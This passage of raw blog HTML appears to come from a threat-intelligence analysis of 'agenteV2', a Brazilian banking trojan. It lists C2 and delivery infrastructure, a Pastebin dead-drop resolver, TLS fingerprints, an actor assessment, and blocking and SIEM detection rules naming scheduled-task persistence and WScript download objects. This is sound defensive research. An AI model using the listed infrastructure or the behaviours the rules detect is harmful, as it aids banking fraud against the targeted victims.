   \"\n                    >\n                                        Transport\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        TCP\/TLS port 8443\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Pastebin proxy\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        172.66.171.73:443 (Cloudflare used only for Pastebin resolution, not C2)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Real C2\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        38.242.246.176:8443 (Contabo VPS, D\u00fcsseldorf, Germany)\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-301'>\ntable#wpdtSimpleTable-301{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-301 td, table.wpdtSimpleTable301 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"571\" height=\"405\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_12.png\" alt=\"\" class=\"wp-image-20465\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_12.png 571w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_12-300x213.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_12-370x262.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_12-270x192.png 270w\" sizes=\"(max-width: 571px) 100vw, 571px\" \/><figcaption class=\"wp-element-caption\"><em>ANY.RUN Network connections tab: periodic ~60s beacons and TLS connection details to 172.66.171.73<\/em><\/figcaption><\/figure><\/div>\n\n\n<h4 class=\"wp-block-heading\"><em>5.3. TLS Fingerprints&nbsp;<\/em><\/h4>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-302\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"6\"\n           data-wpID=\"302\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:13.845099383139%;                    padding:10px;\n                    \"\n                    >\n                                        Fingerprint\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:86.154900616861%;                    padding:10px;\n                    \"\n                    >\n                                        Value\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        JA3\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        a48c0d5f95b1ef98f560f324fd275da1\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        JA3 Full\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        771,4866-4867-4865-49196-49200-49195-49199-52393-52392-49188-49192-49187-49191-159-158-107-103-255,0-11-10-16-22-23-49-13-43-45-51-21,29-23-30-25-24-256-257-258-259-260,0-1-2\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        JA3S\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        15af977ce25de452b96affa2addb1036\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        JA3S Full\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        771,4866,43-51\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        JARM\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000011 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        00000000000000000000000000000000000000000000000000000000000000 (Cloudflare\/Pastebin proxy not C2 fingerprint)\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-302'>\ntable#wpdtSimpleTable-302{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-302 td, table.wpdtSimpleTable302 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000011 { font-size: 11px !important;}\n<\/style>\n\n\n\n\n<p>The JA3 hash (a48c0d5f95b1ef98f560f324fd275da1) can be used as a network detection rule it will match agenteV2&#8217;s TLS&nbsp;ClientHello&nbsp;regardless of C2 IP rotation.&nbsp;<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">6. Threat Actor Infrastructure&nbsp;<\/h3>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"483\" src=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-1024x483.png\" alt=\"\" class=\"wp-image-20470\" srcset=\"https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-1024x483.png 1024w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-300x141.png 300w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-768x362.png 768w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-1536x724.png 1536w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-370x175.png 370w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-270x127.png 270w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13-740x349.png 740w, https:\/\/any.run\/cybersecurity-blog\/wp-content\/uploads\/2026\/04\/brazil_13.png 1940w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><figcaption class=\"wp-element-caption\"><em>Shodan 38.242.246.176: Hestia Control Panel on port 8083, open ports list, hostname vmi3003111.contaboserver.net, nginx banner<\/em><\/figcaption><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\"><em>6.1. Infrastructure Map&nbsp;<\/em><\/h4>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-303\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"3\"\n           data-rows=\"7\"\n           data-wpID=\"303\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:15.203619909502%;                    padding:10px;\n                    \"\n                    >\n                                        Role\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:19.547511312217%;                    padding:10px;\n                    \"\n                    >\n                                        Asset\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"C1\"\n                    data-col-index=\"2\"\n                    data-row-index=\"0\"\n                    style=\" width:65.248868778281%;                    padding:10px;\n                    \"\n                    >\n                                        Details\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Phishing Gate \/ Tracker\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        odaracani[.]online\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C2\"\n                    data-col-index=\"2\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Per-victim unique ID tracking (?id=3df947b3). POST \u2192 302 redirect to payload server. IP: 69.49.241.120\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Payload Distribution\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        nuevaprodeciencia[.]club\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C3\"\n                    data-col-index=\"2\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hosts all EXE payloads (\/br77b\/arquivos\/download\/). C2\u00a0checkin\u00a0endpoint (iayjaskyeiagds.php). IP: 69.49.241.120\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Shared Delivery IP\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        69[.]49.241[.]120\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C4\"\n                    data-col-index=\"2\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Both delivery domains resolve to this single IP single hosting point for Stage 1\/2 infrastructure\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Dead-Drop Resolver\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        pastebin[.]com\/raw\/0RmxqY57\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C5\"\n                    data-col-index=\"2\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Public Pastebin page\u00a0containing\u00a0plaintext C2\u00a0IP:port. Accessed via Cloudflare (172.66.171.73:443)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Real C2 Server\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        38[.]242.246[.]176:8443\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C6\"\n                    data-col-index=\"2\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Contabo GmbH VPS. Hostname: vmi3003111.contaboserver.net. Hestia Control Panel on :8083\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        C2 ASN\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        AS51167 Contabo GmbH\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-fs-000012 wpdt-align-left\"\n                                            data-cell-id=\"C7\"\n                    data-col-index=\"2\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        D\u00fcsseldorf, Germany. Frequently abused by threat actors for permissive abuse handling\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-303'>\ntable#wpdtSimpleTable-303{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-303 td, table.wpdtSimpleTable303 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<h4 class=\"wp-block-heading\"><em>6.2. C2 Server Detail (Shodan)&nbsp;<\/em><\/h4>\n\n\n\n<div class=\"wpdt-c row wpDataTableContainerSimpleTable wpDataTables wpDataTablesWrapper\n\"\n    >\n        <table id=\"wpdtSimpleTable-304\"\n           style=\"border-collapse:collapse;\n                   border-spacing:0px;\"\n           class=\"wpdtSimpleTable wpDataTable\"\n           data-column=\"2\"\n           data-rows=\"8\"\n           data-wpID=\"304\"\n           data-responsive=\"0\"\n           data-has-header=\"1\">\n\n                    <thead>        <tr class=\"wpdt-cell-row \" >\n                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"A1\"\n                    data-col-index=\"0\"\n                    data-row-index=\"0\"\n                    style=\" width:15.083798882682%;                    padding:10px;\n                    \"\n                    >\n                                        Property\u00a0                    <\/th>\n                                                <th class=\"wpdt-cell wpdt-bold wpdt-bc-03A9F4 wpdt-fs-000014\"\n                                            data-cell-id=\"B1\"\n                    data-col-index=\"1\"\n                    data-row-index=\"0\"\n                    style=\" width:84.916201117318%;                    padding:10px;\n                    \"\n                    >\n                                        Value\u00a0                    <\/th>\n                                        <\/tr>\n                    <tbody>        <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A2\"\n                    data-col-index=\"0\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        IP\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B2\"\n                    data-col-index=\"1\"\n                    data-row-index=\"1\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        38.242.246.176\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A3\"\n                    data-col-index=\"0\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hostname\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B3\"\n                    data-col-index=\"1\"\n                    data-row-index=\"2\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        vmi3003111.contaboserver.net\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A4\"\n                    data-col-index=\"0\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        ASN\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B4\"\n                    data-col-index=\"1\"\n                    data-row-index=\"3\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        AS51167 Contabo GmbH\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A5\"\n                    data-col-index=\"0\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Country\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B5\"\n                    data-col-index=\"1\"\n                    data-row-index=\"4\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Germany (D\u00fcsseldorf)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A6\"\n                    data-col-index=\"0\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Control Panel\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B6\"\n                    data-col-index=\"1\"\n                    data-row-index=\"5\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Hestia Control Panel port 8083 (nginx, HTTP 200 OK, active session)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row even\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A7\"\n                    data-col-index=\"0\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        Open Ports\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B7\"\n                    data-col-index=\"1\"\n                    data-row-index=\"6\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        21 (FTP), 22 (SSH), 25\/465\/587 (SMTP), 53 (DNS), 80\/443 (HTTP\/S), 8083 (Hestia), 8443 (C2)\u00a0                    <\/td>\n                                        <\/tr>\n                            <tr class=\"wpdt-cell-row odd\" >\n                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"A8\"\n                    data-col-index=\"0\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        SMTP ports\u00a0                    <\/td>\n                                                <td class=\"wpdt-cell wpdt-align-left wpdt-fs-000012\"\n                                            data-cell-id=\"B8\"\n                    data-col-index=\"1\"\n                    data-row-index=\"7\"\n                    style=\"                    padding:10px;\n                    \"\n                    >\n                                        25, 465, 587 strongly suggests phishing emails dispatched from this same VPS\u00a0                    <\/td>\n                                        <\/tr>\n                    <\/table>\n<\/div><style id='wpdt-custom-style-304'>\ntable#wpdtSimpleTable-304{ table-layout: fixed !important; }\ntable#wpdtSimpleTable-304 td, table.wpdtSimpleTable304 th { white-space: normal !important; }\n.wpdt-bc-03A9F4 { background-color: #03A9F4 !important;}\n.wpdt-fs-000014 { font-size: 14px !important;}\n.wpdt-fs-000012 { font-size: 12px !important;}\n<\/style>\n\n\n\n\n<p>The Hestia Control Panel on port 8083&nbsp;indicates&nbsp;the&nbsp;threat&nbsp;actor self-manages this server rather than using a hosting reseller. The presence of active SMTP ports alongside the C2 port strongly&nbsp;suggests&nbsp;this VPS serves as an all-in-one campaign platform: phishing email dispatch, payload hosting management, and C2 handling.&nbsp;<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Threat Actor Assessment&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Campaign Characteristics&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Exclusively targeting Brazilian users Portuguese lure, CNJ court number format, Brazilian bank\/fintech targeting, and enumeration of LATAM-specific anti-fraud tools (Diebold Warsaw,&nbsp;GbPlugin);&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Judicial summons lure is a well-established social engineering technique in Brazil exploits fear of legal consequences to reduce victim&nbsp;scrutiny;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Per-victim unique tracking ID (?id=3df947b3)&nbsp;demonstrates&nbsp;the actor actively&nbsp;monitors&nbsp;individual infection&nbsp;progress;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>WebSocket persistent backdoor with live screen streaming points to operator-assisted, manual fraud the threat actor watches victims&#8217; screens in real time and waits for banking sessions to&nbsp;open;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Cloudflare Turnstile CAPTCHA on payload server deliberate anti-sandbox and anti-researcher&nbsp;measure;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Multi-step redirect chain before payload delivery adds anti-scraping&nbsp;friction;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>&#8216;agenteV2&#8217; naming implies active development a prior version (v1)&nbsp;likely exists&nbsp;or circulated&nbsp;previously;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nuitka&nbsp;compilation of the core DLL&nbsp;represents&nbsp;a meaningful step above typical Brazilian stealer tradecraft; however, the failure to strip debug strings, variable names, and cleartext URLs is a significant&nbsp;OpSec&nbsp;failure that partially negates the obfuscation investment.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">Infrastructure Assessment&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Two-tier delivery infrastructure (69[.]49.241[.]120 for phishing\/payload, 38[.]242.246[.]176 for C2) separation reduces single-point takedown&nbsp;impact;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Pastebin dead-drop resolver is the primary C2 resilience mechanism actor can rotate C2 IPs by editing a single Pastebin page without touching deployed&nbsp;malware;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Active SMTP ports on C2 VPS strongly suggest self-hosted phishing email dispatch from the same&nbsp;server;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Hestia Control Panel&nbsp;indicates&nbsp;actor self-manages the VPS not a reseller&nbsp;customer;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Contabo GmbH (AS51167) is a known bulletproof-tolerant provider&nbsp;frequently&nbsp;abused by threat actors for affordable pricing and slow abuse&nbsp;response;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Implementation inconsistency (Registry Run value pointing to .py&nbsp;file) suggests the actor has strong Python development skills but limited operational security maturity.&nbsp;&nbsp;<\/li>\n<\/ul>\n\n\n\n<h2 class=\"wp-block-heading\">Detection &amp; Response Recommendations&nbsp;<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">1.&nbsp;Immediate Blocking&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Block domains&nbsp;odaracani[.]online and&nbsp;nuevaprodeciencia[.]club at DNS\/proxy\/firewall;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Block IPs 69[.]49.241[.]120 and 38[.]242.246[.]176 at&nbsp;perimeter;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Add JA3 hash a48c0d5f95b1ef98f560f324fd275da1 as a network detection rule (IDS\/NDR\/EDR);&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Block or alert on access to&nbsp;pastebin[.]com\/raw\/0RmxqY57 and request takedown of the&nbsp;page;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Deploy Suricata SIDs listed in section 6.6.&nbsp;<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\">2. SIEM Detection Rules&nbsp;<\/h3>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Alert: WScript.exe spawning cmd.exe with &#8216;schtasks&#8217; + &#8216;\/rl&nbsp;highest&#8217; in command&nbsp;line;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Alert: Any process writing PE files to C:\\Program Files (x86)\\Wi-fi\\;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Alert: Scheduled Task creation with \/rl&nbsp;highest by non-SYSTEM processes (Event ID 4698);&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Alert: HKCU\\Run key creation by non-installer&nbsp;processes;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Alert:&nbsp;ADODB.Stream&nbsp;+ MSXML2.ServerXMLHTTP instantiated in the same WScript.exe&nbsp;process;&nbsp;<\/li>\n<\/ul>\n\n\n\n<ul 